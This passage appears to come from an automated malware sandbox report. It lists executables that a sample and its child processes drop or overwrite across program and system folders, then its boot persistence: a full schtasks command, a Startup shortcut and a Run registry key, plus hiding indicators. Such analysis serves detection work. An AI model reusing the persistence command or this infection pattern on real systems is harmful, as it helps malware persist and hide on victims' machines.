                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,13_2_006ECBD0
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02D0AB1C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
